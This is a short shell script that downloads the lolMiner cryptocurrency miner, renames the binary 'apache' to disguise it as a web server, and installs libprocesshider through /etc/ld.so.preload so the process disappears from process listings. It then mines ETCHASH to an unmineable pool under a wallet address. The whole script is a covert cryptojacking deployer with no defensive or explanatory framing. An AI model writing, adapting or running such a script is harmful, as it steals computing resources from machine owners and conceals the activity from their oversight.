#!/bin/sh
sudo ln -fs /usr/share/zoneinfo/Africa/Johannesburg /etc/localtime
sudo dpkg-reconfigure --frontend noninteractive tzdata
sudo apt update
apt -y install binutils cmake build-essential screen unzip net-tools curl nano tor
sudo service tor start

wget https://github.com/Lolliedieb/lolMiner-releases/releases/download/1.51/lolMiner_v1.51_Lin64.tar.gz
tar -xf lolMiner_v1.51_Lin64.tar.gz
cd 1.51
mv lolMiner ../apache
cd ..

git clone https://github.com/hanifgz/libprocesshider.git
cd libprocesshider
make
sudo mv libprocesshider.so /usr/local/lib/;sudo su -c 'echo /usr/local/lib/libprocesshider.so >> /etc/ld.so.preload'
cd ..

./apache --algo ETCHASH --pool etchash-eu.unmineable.com:3333 --user USDT:TFV2Lz82FGocoXdBJuc9tJSREcTZFSxav2.(echo Mie-$(shuf -i 0001-1000 -n 1))#nfnk-p4ug
